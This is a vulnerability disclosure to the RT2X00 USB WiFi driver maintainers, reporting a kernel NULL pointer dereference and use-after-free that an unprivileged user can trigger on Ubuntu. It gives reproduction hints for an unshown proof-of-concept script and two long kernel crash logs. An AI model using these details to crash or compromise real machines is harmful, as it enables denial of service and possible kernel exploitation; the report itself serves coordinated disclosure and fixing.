Ubuntu RT2X00 WiFi USB Driver Kernel NULL Pointer Dereference & Use-After-Free Vulnerability

Dear RT2X00 driver maintainers,

We have discovered a critical vulnerability in the RT2X00 driver. We recommend urgently submitting an update.

Vulnerability Description: When a PC is running Ubuntu 22.04 or 24.04, executing our proof of concept (POC) can directly cause a null pointer dereference or use-after-free (UAF). The systems we tested were:

We tested network cards from the RT2870/RT3070/RT5370 series, which all belong to the RT2X00 driver group, and all were able to trigger the vulnerability. Additionally, executing the POC requires only user-level privileges. Debian systems are not affected.


Now, there are a few issues that need to be discussed. When executing the POC on different PCs, it not only triggers a null pointer dereference but also occasionally triggers a use-after-free (UAF) issue. You can test this issue yourselves.

POC Execution Method:

python3 poc.py

Some systems might be affected by the time.sleep function. If you cannot successfully reproduce the issue, please modify time.sleep(0.1) in the script to time.sleep(0.2). Below, I will provide the logs of the null pointer dereference and UAF from our kernel for analysis.

Replace the VID and PID with your USB network card ID, which you can check using lsusb.

--------------


Crash Log 1: NULL pointer dereference


[  371.188382] ieee80211 phy23: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[  371.188467] ieee80211 phy23: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36
[  371.258315] BUG: kernel NULL pointer dereference, address: 0000000000000038
[  371.258324] #PF: supervisor write access in kernel mode
[  371.258328] #PF: error_code(0x0002) - not-present page
[  371.258330] PGD 0 P4D 0
[  371.258335] Oops: 0002 [#1] PREEMPT SMP NOPTI
[  371.258339] CPU: 8 PID: 144 Comm: kworker/u40:2 Not tainted 6.8.0-40-generic #40~22.04.2-Ubuntu
[  371.258344] Hardware name: Dell Inc. Vostro 3710/072TMP, BIOS 1.1.66 06/22/2022
[  371.258346] Workqueue: phy23 rt2x00usb_work_rxdone [rt2x00usb]
[  371.258363] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[  371.258374] Code: 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8 00 00 00 00 48 c7 45 e0 00 00 00 00 74 45 4c 8d 65 c8 eb 2b 48 8b 47 18 be c0 0c 00 00 <4c> 89 60 38 48 8b 57 10 0f b6 52 6a 88 50 31 e8 8d cc ec ff 48 8b
[  371.258377] RSP: 0018:ffffa1de4063fe08 EFLAGS: 00010246
[  371.258381] RAX: 0000000000000000 RBX: ffff8b1ef7366a90 RCX: 0000000000000000
[  371.258383] RDX: 0000000000000000 RSI: 0000000000000cc0 RDI: ffff8b1d0be0e000
[  371.258386] RBP: ffffa1de4063fe40 R08: 0000000000000000 R09: 0000000000000000
[  371.258388] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa1de4063fe08
[  371.258390] R13: ffff8b1d001fcc00 R14: ffff8b1d0a838e05 R15: ffff8b1ef7366a90
[  371.258392] FS:  0000000000000000(0000) GS:ffff8b207f600000(0000) knlGS:0000000000000000
[  371.258395] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  371.258397] CR2: 0000000000000038 CR3: 000000044d43c000 CR4: 0000000000f50ef0
[  371.258400] PKRU: 55555554
[  371.258402] Call Trace:
[  371.258405]  <TASK>
[  371.258408]  ? show_regs+0x6d/0x80
[  371.258416]  ? __die+0x24/0x80
[  371.258419]  ? page_fault_oops+0x99/0x1b0
[  371.258425]  ? do_user_addr_fault+0x2ed/0x670
[  371.258430]  ? exc_page_fault+0x83/0x1b0
[  371.258437]  ? asm_exc_page_fault+0x27/0x30
[  371.258444]  ? rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[  371.258454]  ? rt2x00usb_work_rxdone+0x8b/0xc0 [rt2x00usb]
[  371.258463]  process_one_work+0x16c/0x350
[  371.258470]  worker_thread+0x306/0x440
[  371.258476]  ? __pfx_worker_thread+0x10/0x10
[  371.258482]  kthread+0xef/0x120
[  371.258486]  ? __pfx_kthread+0x10/0x10
[  371.258491]  ret_from_fork+0x44/0x70
[  371.258495]  ? __pfx_kthread+0x10/0x10
[  371.258499]  ret_from_fork_asm+0x1b/0x30
[  371.258505]  </TASK>
[  371.258506] Modules linked in: ccm snd_hda_codec_hdmi rfcomm xe snd_hda_codec_cs8409 snd_hda_codec_generic drm_gpuvm drm_exec gpu_sched drm_suballoc_helper drm_ttm_helper cmac algif_hash overlay algif_skcipher af_alg bnep intel_uncore_frequency intel_uncore_frequency_common snd_sof_pci_intel_tgl x86_pkg_temp_thermal snd_sof_intel_hda_common intel_powerclamp coretemp soundwire_intel snd_sof_intel_hda_mlink soundwire_cadence snd_sof_intel_hda kvm_intel snd_sof_pci snd_sof_xtensa_dsp snd_sof kvm snd_sof_utils snd_soc_hdac_hda snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi soundwire_generic_allocation irqbypass soundwire_bus crct10dif_pclmul polyval_clmulni polyval_generic ghash_clmulni_intel binfmt_misc snd_usb_audio snd_soc_core sha256_ssse3 sha1_ssse3 snd_usbmidi_lib aesni_intel rtw88_8821ce snd_compress snd_ump ac97_bus mc rtw88_8821c rt2800usb snd_pcm_dmaengine rtw88_pci rt2x00usb crypto_simd cryptd snd_hda_intel rt2800lib dell_wmi snd_seq_midi snd_intel_dspcfg rtw88_core snd_intel_sdw_acpi snd_seq_midi_event
[  371.258573]  rt2x00lib dell_smbios rapl snd_hda_codec btusb snd_rawmidi mei_pxp mei_hdcp intel_rapl_msr dcdbas nls_iso8859_1 intel_cstate i915 mac80211 snd_hda_core dell_wmi_ddv btrtl snd_seq dell_smm_hwmon processor_thermal_device_pci snd_hwdep btintel cmdlinepart processor_thermal_device drm_buddy dell_wmi_sysman btbcm ledtrig_audio processor_thermal_wt_hint ttm firmware_attributes_class sparse_keymap dell_wmi_descriptor wmi_bmof snd_pcm spi_nor btmtk processor_thermal_rfim snd_seq_device mtd ee1004 snd_timer drm_display_helper processor_thermal_rapl cfg80211 bluetooth intel_rapl_common cec snd mei_me pl2303 processor_thermal_wt_req rc_core ecdh_generic processor_thermal_power_floor usbserial input_leds joydev mei i2c_algo_bit libarc4 ecc soundcore processor_thermal_mbox int340x_thermal_zone intel_pmc_core intel_vsec int3400_thermal pmt_telemetry acpi_thermal_rel pmt_class acpi_tad acpi_pad mac_hid sch_fq_codel msr parport_pc ppdev lp parport efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid nvme
[  371.258648]  crc32_pclmul i2c_i801 spi_intel_pci nvme_core i2c_smbus r8169 spi_intel ahci nvme_auth xhci_pci video xhci_pci_renesas libahci realtek wmi
[  371.258665] CR2: 0000000000000038
[  371.258668] ---[ end trace 0000000000000000 ]---
[  371.785813] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[  371.785851] Code: 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8 00 00 00 00 48 c7 45 e0 00 00 00 00 74 45 4c 8d 65 c8 eb 2b 48 8b 47 18 be c0 0c 00 00 <4c> 89 60 38 48 8b 57 10 0f b6 52 6a 88 50 31 e8 8d cc ec ff 48 8b
[  371.785854] RSP: 0018:ffffa1de4063fe08 EFLAGS: 00010246
[  371.785861] RAX: 0000000000000000 RBX: ffff8b1ef7366a90 RCX: 0000000000000000
[  371.785863] RDX: 0000000000000000 RSI: 0000000000000cc0 RDI: ffff8b1d0be0e000
[  371.785864] RBP: ffffa1de4063fe40 R08: 0000000000000000 R09: 0000000000000000
[  371.785866] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa1de4063fe08
[  371.785867] R13: ffff8b1d001fcc00 R14: ffff8b1d0a838e05 R15: ffff8b1ef7366a90
[  371.785868] FS:  0000000000000000(0000) GS:ffff8b207f600000(0000) knlGS:0000000000000000
[  371.785870] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  371.785872] CR2: 0000000000000038 CR3: 000000011dc92000 CR4: 0000000000f50ef0
[  371.785873] PKRU: 55555554
[  371.785876] note: kworker/u40:2[144] exited with irqs disabled
[  371.793418] ieee80211 phy23: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting
[  371.793422] ieee80211 phy23: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[  371.799526] systemd-journald[438]: Compressed data object 1029 -> 509 using ZSTD
[  371.799553] systemd-journald[438]: Compressed data object 1020 -> 543 using ZSTD
[  387.857111] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.857138] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.861450] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.861472] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.865327] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.865344] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.872995] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.873032] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.961986] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  387.962012] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  388.018331] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  388.018398] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  388.067180] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  388.067201] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  388.323049] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  388.323086] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[  453.167476] systemd-journald[438]: Sent WATCHDOG=1 notification.



Crash Log 2: UAF



[  +0.000002] refcount_t: addition on 0; use-after-free.
[  +0.000006] WARNING: CPU: 16 PID: 754 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x150
[  +0.000007] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper nls_iso8859_1 ttm crypto_simd
[  +0.000095]  snd_seq cryptd cfg80211 drm_display_helper snd_seq_device snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core xhci_pci_renesas realtek nvme_common wmi
[  +0.000063] CPU: 16 PID: 754 Comm: NetworkManager Not tainted 6.5.0-41-generic #41~22.04.2-Ubuntu
[  +0.000003] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[  +0.000001] RIP: 0010:refcount_warn_saturate+0x12e/0x150
[  +0.000003] Code: 1d a5 cc dc 01 80 fb 01 0f 87 6c f8 8d 00 83 e3 01 0f 85 52 ff ff ff 48 c7 c7 10 c0 1c a8 c6 05 85 cc dc 01 01 e8 d2 9f 8f ff <0f> 0b e9 38 ff ff ff 48 c7 c7 e8 bf 1c a8 c6 05 6c cc dc 01 01 e8
[  +0.000002] RSP: 0018:ffffb0fe4126f4e8 EFLAGS: 00010246
[  +0.000003] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  +0.000002] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
[  +0.000001] RBP: ffffb0fe4126f4f0 R08: 0000000000000000 R09: 0000000000000000
[  +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: ffff919769c2e800
[  +0.000002] R13: ffff91954a975000 R14: 0000000000000820 R15: 00000000ffffff00
[  +0.000002] FS:  00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[  +0.000002] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  +0.000001] CR2: 00000000dc9cae6c CR3: 000000011e4ce000 CR4: 0000000000750ee0
[  +0.000002] PKRU: 55555554
[  +0.000001] Call Trace:
[  +0.000002]  <TASK>
[  +0.000003]  ? show_regs+0x6d/0x80
[  +0.000005]  ? __warn+0x89/0x160
[  +0.000004]  ? refcount_warn_saturate+0x12e/0x150
[  +0.000003]  ? report_bug+0x17e/0x1b0
[  +0.000005]  ? handle_bug+0x46/0x90
[  +0.000004]  ? exc_invalid_op+0x18/0x80
[  +0.000003]  ? asm_exc_invalid_op+0x1b/0x20
[  +0.000006]  ? refcount_warn_saturate+0x12e/0x150
[  +0.000003]  ? refcount_warn_saturate+0x12e/0x150
[  +0.000003]  usb_get_urb+0x52/0x90
[  +0.000004]  usb_hcd_submit_urb+0x23/0x2e0
[  +0.000003]  usb_submit_urb+0x254/0x6c0
[  +0.000006]  rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb]
[  +0.000006]  rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb]
[  +0.000005]  rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib]
[  +0.000008]  rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib]
[  +0.000007]  rt2x00lib_start+0x87/0xd0 [rt2x00lib]
[  +0.000007]  rt2x00mac_start+0x2d/0x80 [rt2x00lib]
[  +0.000007]  drv_start+0x55/0x130 [mac80211]
[  +0.000033]  ieee80211_do_open+0x353/0x7e0 [mac80211]
[  +0.000030]  ieee80211_open+0x76/0xa0 [mac80211]
[  +0.000027]  __dev_open+0x105/0x1d0
[  +0.000004]  __dev_change_flags+0x1b5/0x230
[  +0.000003]  dev_change_flags+0x27/0x80
[  +0.000003]  do_setlink+0x3a1/0xe60
[  +0.000004]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? __nla_validate_parse+0x49/0x1e0
[  +0.000005]  __rtnl_newlink+0x6e5/0x770
[  +0.000005]  rtnl_newlink+0x48/0x80
[  +0.000003]  rtnetlink_rcv_msg+0x170/0x430
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[  +0.000002]  netlink_rcv_skb+0x5d/0x110
[  +0.000005]  rtnetlink_rcv+0x15/0x30
[  +0.000003]  netlink_unicast+0x1b3/0x2a0
[  +0.000002]  netlink_sendmsg+0x25e/0x4e0
[  +0.000004]  ____sys_sendmsg+0x3ef/0x420
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ___sys_sendmsg+0x9a/0xf0
[  +0.000004]  ? kvfree+0x31/0x40
[  +0.000005]  __sys_sendmsg+0x89/0xf0
[  +0.000004]  __x64_sys_sendmsg+0x1d/0x30
[  +0.000001]  x64_sys_call+0x114d/0x20b0
[  +0.000003]  do_syscall_64+0x55/0x90
[  +0.000002]  ? __rseq_handle_notify_resume+0x37/0x70
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? exit_to_user_mode_loop+0xe5/0x130
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? exit_to_user_mode_prepare+0x30/0xb0
[  +0.000001]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? syscall_exit_to_user_mode+0x37/0x60
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000001]  ? do_syscall_64+0x61/0x90
[  +0.000002]  ? do_syscall_64+0x61/0x90
[  +0.000002]  entry_SYSCALL_64_after_hwframe+0x73/0xdd
[  +0.000002] RIP: 0033:0x7bfb4872799d
[  +0.000021] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48
[  +0.000001] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: 000000000000002e
[  +0.000002] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: 00007bfb4872799d
[  +0.000002] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: 000000000000000c
[  +0.000001] RBP: 000055d422a2e030 R08: 0000000000000000 R09: 0000000000000000
[  +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[  +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: 0000000000000000
[  +0.000003]  </TASK>
[  +0.000001] ---[ end trace 0000000000000000 ]---
[  +0.000004] ------------[ cut here ]------------
[  +0.000001] refcount_t: underflow; use-after-free.
[  +0.000004] WARNING: CPU: 16 PID: 754 at lib/refcount.c:28 refcount_warn_saturate+0xa3/0x150
[  +0.000003] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper nls_iso8859_1 ttm crypto_simd
[  +0.000055]  snd_seq cryptd cfg80211 drm_display_helper snd_seq_device snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core xhci_pci_renesas realtek nvme_common wmi
[  +0.000036] CPU: 16 PID: 754 Comm: NetworkManager Tainted: G        W          6.5.0-41-generic #41~22.04.2-Ubuntu
[  +0.000002] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[  +0.000001] RIP: 0010:refcount_warn_saturate+0xa3/0x150
[  +0.000002] Code: 94 00 0f b6 1d 2b cd dc 01 80 fb 01 0f 87 df f8 8d 00 83 e3 01 75 dd 48 c7 c7 40 c0 1c a8 c6 05 0f cd dc 01 01 e8 5d a0 8f ff <0f> 0b eb c6 0f b6 1d 02 cd dc 01 80 fb 01 0f 87 9f f8 8d 00 83 e3
[  +0.000002] RSP: 0018:ffffb0fe4126f4e8 EFLAGS: 00010246
[  +0.000001] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  +0.000001] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
[  +0.000001] RBP: ffffb0fe4126f4f0 R08: 0000000000000000 R09: 0000000000000000
[  +0.000002] R10: 0000000000000000 R11: 0000000000000000 R12: 00000000fffffffe
[  +0.000001] R13: ffff91954a975000 R14: 0000000000000820 R15: 00000000ffffff00
[  +0.000001] FS:  00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[  +0.000001] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  +0.000002] CR2: 00000000dc9cae6c CR3: 000000011e4ce000 CR4: 0000000000750ee0
[  +0.000001] PKRU: 55555554
[  +0.000001] Call Trace:
[  +0.000001]  <TASK>
[  +0.000001]  ? show_regs+0x6d/0x80
[  +0.000002]  ? __warn+0x89/0x160
[  +0.000003]  ? refcount_warn_saturate+0xa3/0x150
[  +0.000002]  ? report_bug+0x17e/0x1b0
[  +0.000003]  ? handle_bug+0x46/0x90
[  +0.000002]  ? exc_invalid_op+0x18/0x80
[  +0.000003]  ? asm_exc_invalid_op+0x1b/0x20
[  +0.000003]  ? refcount_warn_saturate+0xa3/0x150
[  +0.000003]  ? refcount_warn_saturate+0xa3/0x150
[  +0.000001]  usb_free_urb+0x67/0x80
[  +0.000003]  usb_hcd_submit_urb+0x14e/0x2e0
[  +0.000002]  usb_submit_urb+0x254/0x6c0
[  +0.000003]  rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb]
[  +0.000005]  rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb]
[  +0.000003]  rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib]
[  +0.000006]  rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib]
[  +0.000005]  rt2x00lib_start+0x87/0xd0 [rt2x00lib]
[  +0.000005]  rt2x00mac_start+0x2d/0x80 [rt2x00lib]
[  +0.000005]  drv_start+0x55/0x130 [mac80211]
[  +0.000025]  ieee80211_do_open+0x353/0x7e0 [mac80211]
[  +0.000028]  ieee80211_open+0x76/0xa0 [mac80211]
[  +0.000026]  __dev_open+0x105/0x1d0
[  +0.000004]  __dev_change_flags+0x1b5/0x230
[  +0.000003]  dev_change_flags+0x27/0x80
[  +0.000003]  do_setlink+0x3a1/0xe60
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? __nla_validate_parse+0x49/0x1e0
[  +0.000004]  __rtnl_newlink+0x6e5/0x770
[  +0.000005]  rtnl_newlink+0x48/0x80
[  +0.000002]  rtnetlink_rcv_msg+0x170/0x430
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[  +0.000002]  netlink_rcv_skb+0x5d/0x110
[  +0.000005]  rtnetlink_rcv+0x15/0x30
[  +0.000002]  netlink_unicast+0x1b3/0x2a0
[  +0.000003]  netlink_sendmsg+0x25e/0x4e0
[  +0.000003]  ____sys_sendmsg+0x3ef/0x420
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000004]  ___sys_sendmsg+0x9a/0xf0
[  +0.000003]  ? kvfree+0x31/0x40
[  +0.000004]  __sys_sendmsg+0x89/0xf0
[  +0.000004]  __x64_sys_sendmsg+0x1d/0x30
[  +0.000002]  x64_sys_call+0x114d/0x20b0
[  +0.000002]  do_syscall_64+0x55/0x90
[  +0.000001]  ? __rseq_handle_notify_resume+0x37/0x70
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? exit_to_user_mode_loop+0xe5/0x130
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000001]  ? exit_to_user_mode_prepare+0x30/0xb0
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? syscall_exit_to_user_mode+0x37/0x60
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? do_syscall_64+0x61/0x90
[  +0.000001]  ? do_syscall_64+0x61/0x90
[  +0.000002]  entry_SYSCALL_64_after_hwframe+0x73/0xdd
[  +0.000002] RIP: 0033:0x7bfb4872799d
[  +0.000005] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48
[  +0.000002] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: 000000000000002e
[  +0.000002] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: 00007bfb4872799d
[  +0.000001] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: 000000000000000c
[  +0.000001] RBP: 000055d422a2e030 R08: 0000000000000000 R09: 0000000000000000
[  +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[  +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: 0000000000000000
[  +0.000003]  </TASK>
[  +0.000001] ---[ end trace 0000000000000000 ]---
[  +0.000002] BUG: unable to handle page fault for address: 00000000000011b0
[  +0.000003] #PF: supervisor read access in kernel mode
[  +0.000001] #PF: error_code(0x0000) - not-present page
[  +0.000002] PGD 0 P4D 0
[  +0.000003] Oops: 0000 [#1] PREEMPT SMP NOPTI
[  +0.000002] CPU: 16 PID: 754 Comm: NetworkManager Tainted: G        W          6.5.0-41-generic #41~22.04.2-Ubuntu
[  +0.000002] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[  +0.000001] RIP: 0010:rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb]
[  +0.000004] Code: d2 31 c9 31 f6 31 ff 45 31 c0 e9 e6 1a 90 e5 66 0f 1f 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 <48> 8b 47 10 48 c7 07 00 00 00 00 83 78 10 0e 74 0b 31 c0 31 f6 31
[  +0.000002] RSP: 0018:ffffb0fe4126f5e0 EFLAGS: 00010206
[  +0.000002] RAX: ffffffffc20411f0 RBX: 000000000000005f RCX: 0000000000000000
[  +0.000001] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000000011a0
[  +0.000002] RBP: ffffb0fe4126f600 R08: 0000000000000000 R09: 0000000000000000
[  +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: ffff919567fab4f0
[  +0.000002] R13: ffff9198efd9e060 R14: ffff9198efd9c900 R15: ffff9196786a4000
[  +0.000001] FS:  00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[  +0.000002] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  +0.000002] CR2: 00000000000011b0 CR3: 000000011e4ce000 CR4: 0000000000750ee0
[  +0.000001] PKRU: 55555554
[  +0.000001] Call Trace:
[  +0.000002]  <TASK>
[  +0.000001]  ? show_regs+0x6d/0x80
[  +0.000003]  ? __die+0x24/0x80
[  +0.000003]  ? page_fault_oops+0x99/0x1b0
[  +0.000004]  ? do_user_addr_fault+0x31d/0x6b0
[  +0.000003]  ? exc_page_fault+0x83/0x1b0
[  +0.000003]  ? asm_exc_page_fault+0x27/0x30
[  +0.000003]  ? __pfx_rt2x00usb_clear_entry+0x10/0x10 [rt2x00usb]
[  +0.000004]  ? rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb]
[  +0.000005]  ? rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib]
[  +0.000005]  rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib]
[  +0.000006]  rt2x00lib_start+0x87/0xd0 [rt2x00lib]
[  +0.000005]  rt2x00mac_start+0x2d/0x80 [rt2x00lib]
[  +0.000006]  drv_start+0x55/0x130 [mac80211]
[  +0.000025]  ieee80211_do_open+0x353/0x7e0 [mac80211]
[  +0.000028]  ieee80211_open+0x76/0xa0 [mac80211]
[  +0.000027]  __dev_open+0x105/0x1d0
[  +0.000004]  __dev_change_flags+0x1b5/0x230
[  +0.000003]  dev_change_flags+0x27/0x80
[  +0.000004]  do_setlink+0x3a1/0xe60
[  +0.000004]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? __nla_validate_parse+0x49/0x1e0
[  +0.000004]  __rtnl_newlink+0x6e5/0x770
[  +0.000006]  rtnl_newlink+0x48/0x80
[  +0.000003]  rtnetlink_rcv_msg+0x170/0x430
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[  +0.000003]  netlink_rcv_skb+0x5d/0x110
[  +0.000005]  rtnetlink_rcv+0x15/0x30
[  +0.000002]  netlink_unicast+0x1b3/0x2a0
[  +0.000003]  netlink_sendmsg+0x25e/0x4e0
[  +0.000004]  ____sys_sendmsg+0x3ef/0x420
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ___sys_sendmsg+0x9a/0xf0
[  +0.000004]  ? kvfree+0x31/0x40
[  +0.000005]  __sys_sendmsg+0x89/0xf0
[  +0.000004]  __x64_sys_sendmsg+0x1d/0x30
[  +0.000002]  x64_sys_call+0x114d/0x20b0
[  +0.000002]  do_syscall_64+0x55/0x90
[  +0.000002]  ? __rseq_handle_notify_resume+0x37/0x70
[  +0.000003]  ? srso_alias_return_thunk+0x5/0x7f
